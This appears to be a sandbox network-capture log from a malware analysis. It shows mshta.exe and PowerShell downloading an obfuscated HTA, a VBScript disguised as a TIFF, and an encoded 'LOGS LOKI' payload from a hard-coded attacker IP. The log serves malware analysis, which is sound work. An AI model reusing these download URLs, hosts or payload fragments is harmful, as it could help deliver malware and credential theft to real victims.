                                                                                    Oct 24, 2024 08:45:24.692964077 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                    Oct 24, 2024 08:45:24.693002939 CEST1096INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                    Oct 24, 2024 08:45:24.693046093 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                    Oct 24, 2024 08:45:24.698542118 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.2249166192.3.176.141803484C:\Windows\System32\mshta.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:45:26.735239983 CEST452OUTGET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Range: bytes=8896-
                                                                                    Connection: Keep-Alive
                                                                                    Host: 192.3.176.141
                                                                                    If-Range: "20a04-6252e4f9e216e"
                                                                                    Oct 24, 2024 08:45:27.389779091 CEST1236INHTTP/1.1 206 Partial Content
                                                                                    Date: Thu, 24 Oct 2024 06:45:26 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT
                                                                                    ETag: "20a04-6252e4f9e216e"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 124740
                                                                                    Content-Range: bytes 8896-133635/133636
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/hta
                                                                                    Data Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 [TRUNCATED]
                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                    Oct 24, 2024 08:45:27.389837980 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Oct 24, 2024 08:45:27.389909029 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                    Oct 24, 2024 08:45:27.389930010 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                    Oct 24, 2024 08:45:27.389967918 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                    Oct 24, 2024 08:45:27.389986992 CEST1096INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                    Oct 24, 2024 08:45:27.390022993 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Oct 24, 2024 08:45:27.390041113 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                    Oct 24, 2024 08:45:27.390059948 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                    Oct 24, 2024 08:45:27.390081882 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Oct 24, 2024 08:45:27.395416021 CEST848INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 32 38 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                    Data Ascii: 509%252509%252509%252528%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.2249167192.3.176.141803568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:45:33.740700960 CEST369OUTGET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1
                                                                                    Accept: */*
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: 192.3.176.141
                                                                                    Connection: Keep-Alive
                                                                                    Oct 24, 2024 08:45:34.428013086 CEST1236INHTTP/1.1 200 OK
                                                                                    Date: Thu, 24 Oct 2024 06:45:33 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:28:17 GMT
                                                                                    ETag: "22272-6252e1433ac91"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 139890
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: image/tiff
                                                                                    Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 61 00 6d 00 62 00 72 00 65 00 69 00 72 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 [TRUNCATED]
                                                                                    Data Ascii: private function CreateSession(wsman, conStr, optDic, estambreiro) dim apoucadoFlags dim conOpt dim apoucado dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword apoucadoFlags = 0 proxyAccessTy
                                                                                    Oct 24, 2024 08:45:34.428044081 CEST212INData Raw: 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70
                                                                                    Data Ascii: pe = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanism
                                                                                    Oct 24, 2024 08:45:34.428060055 CEST1236INData Raw: 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78
                                                                                    Data Ascii: Val = 0 proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(N
                                                                                    Oct 24, 2024 08:45:34.428076029 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 20 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f
                                                                                    Data Ascii: ' Invalid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if
                                                                                    Oct 24, 2024 08:45:34.428091049 CEST1236INData Raw: 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65
                                                                                    Data Ascii: ' option is only valid when used with the '-remote' option" apoucadoFlags = apoucadoFlags OR wsman.SessionFlagUs
                                                                                    Oct 24, 2024 08:45:34.428106070 CEST636INData Raw: 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f
                                                                                    Data Ascii: ERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:none'" ASSERTBOOL not optDic.Argu
                                                                                    Oct 24, 2024 08:45:34.428121090 CEST1236INData Raw: 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d
                                                                                    Data Ascii: TBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'"
                                                                                    Oct 24, 2024 08:45:34.428138018 CEST212INData Raw: 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22
                                                                                    Data Ascii: not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'"
                                                                                    Oct 24, 2024 08:45:34.428152084 CEST1236INData Raw: 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64
                                                                                    Data Ascii: apoucadoFlags = apoucadoFlags OR wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseDigest
                                                                                    Oct 24, 2024 08:45:34.428169966 CEST1236INData Raw: 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 65 00 67 00 6f 00 74 00 69 00 61 00 74 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                    Data Ascii: ot valid for '-auth:negotiate'" apoucadoFlags = apoucadoFlags OR wsman.SessionFlagUseNegotiate
                                                                                    Oct 24, 2024 08:45:34.433525085 CEST1236INData Raw: 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d
                                                                                    Data Ascii: _PASSWORD & "' option is not valid for '-auth:certificate'" apoucadoFlags = apoucadoFlags OR wsman.Sessi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.2249174192.3.176.141802600C:\Windows\System32\mshta.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:45:46.018553019 CEST487OUTGET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    If-Modified-Since: Thu, 24 Oct 2024 00:44:54 GMT
                                                                                    Connection: Keep-Alive
                                                                                    Host: 192.3.176.141
                                                                                    If-None-Match: "20a04-6252e4f9e216e"
                                                                                    Oct 24, 2024 08:45:46.719068050 CEST275INHTTP/1.1 304 Not Modified
                                                                                    Date: Thu, 24 Oct 2024 06:45:45 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT
                                                                                    ETag: "20a04-6252e4f9e216e"
                                                                                    Accept-Ranges: bytes
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.2249177192.3.176.141804000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:03.232137918 CEST81OUTGET /36/LOGS%20LOKI.txt HTTP/1.1
                                                                                    Host: 192.3.176.141
                                                                                    Connection: Keep-Alive
                                                                                    Oct 24, 2024 08:46:03.924801111 CEST1236INHTTP/1.1 200 OK
                                                                                    Date: Thu, 24 Oct 2024 06:46:02 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:22:01 GMT
                                                                                    ETag: "22aac-6252dfdc859ae"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 141996
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: text/plain
                                                                                    Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                    Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.924824953 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.924844027 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.924851894 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
